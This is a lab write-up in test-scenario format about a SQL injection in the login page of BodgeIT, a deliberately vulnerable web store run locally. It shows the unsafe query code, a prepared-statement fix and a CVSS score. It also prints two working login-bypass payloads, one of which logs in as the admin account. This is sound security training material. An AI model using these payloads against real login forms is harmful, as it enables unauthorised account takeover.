## Version 1.4.1
## language: en

Feature:
  TOE:
    BodgeIT
  Category:
    Injection Flaws
  Location:
    bodgeit/login.jsp - username (parameter)
  CWE:
    CWE-0089: Improper Neutralization of Special Elements used in an SQL Command
    ('SQL Injection') -base-
      https://cwe.mitre.org/data/definitions/89.html
    CWE-0943: Improper Neutralization of Special Elements in Data Query
    Logic -class-
      https://cwe.mitre.org/data/definitions/943.html
    CWE-1019: Validate Inputs
      https://cwe.mitre.org/data/definitions/1019.html
  CAPEC:
    CAPEC-066: SQL Injection -standard-
      http://capec.mitre.org/data/definitions/66.html
    CAPEC-248: Command Injection
      http://capec.mitre.org/data/definitions/248.html
  Rule:
    REQ.172: https://fluidattacks.com/web/es/rules/172/
  Goal:
    Login as an already existing user
  Recommendation:
    Sanitize user input and use prepared statements for SQL queries

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
  TOE information:
    Given I am running BodgeIT in a docker container at
    """
    http://localhost:8000/bodgeit/
    """

  Scenario: Normal use case
  Normal site navigation
    Given I go to http://localhost:8000/bodgeit/
    Then I can login and buy products as my own user

  Scenario: Static detection
  No user validation in admin section
    When I look at the code at "/bodgeit/root/login.jsp"
    """
    ...
    12  Statement stmt = conn.createStatement();
    13  ResultSet rs = null;
    14  try {
    15    rs = stmt.executeQuery("SELECT * FROM Users WHERE (name = '" + usernam
    e + "' AND password = '" + password + "')");
    ...
    """
    Then I see it passes raw user input to the SQL query

  Scenario: Dynamic detection
  SQL injection
    Given I go to the login form
    And attempt an SQL injection in the username field "' OR '1'='1')-- "
    Then I get a success message
    """
    You have logged in successfully: ' OR '1'='1')--
    """
    And find myself logged in as "user1@thebodgeitstore.com"

  Scenario: Exploitation
  Logging in as admin
    Given I know there's an SQL injection in the login system
    Then I attempt an injection to log in as "admin@thebodgeitstore.com"
    """
    admin@thebodgeitstore.com') --
    """
    Then I get logged in as admin
    And find the admin-only resources in the menu

  Scenario: Remediation
  Only rendering admin page if user is admin
    Given I patch the code like this
    """
    ...
    12  PreparedStatement stmt = conn.prepareStatement("SELECT * FROM Users
    WHERE (name = ? AND password = ?)");
    13  stmt.setString(1, username);
    14  stmt.setString(2, password);
    15  ResultSet rs = null;
    16  try {
    17    rs = stmt.executeQuery();
    ...
    """
    Then the page isn't vulnerable to SQL Injection anymore

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.6/10 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/
  Temporal: Attributes that measure the exploit's popularity and fixability
    8.0/10 (High) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    8.0/10 (High) - CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2019-02-14
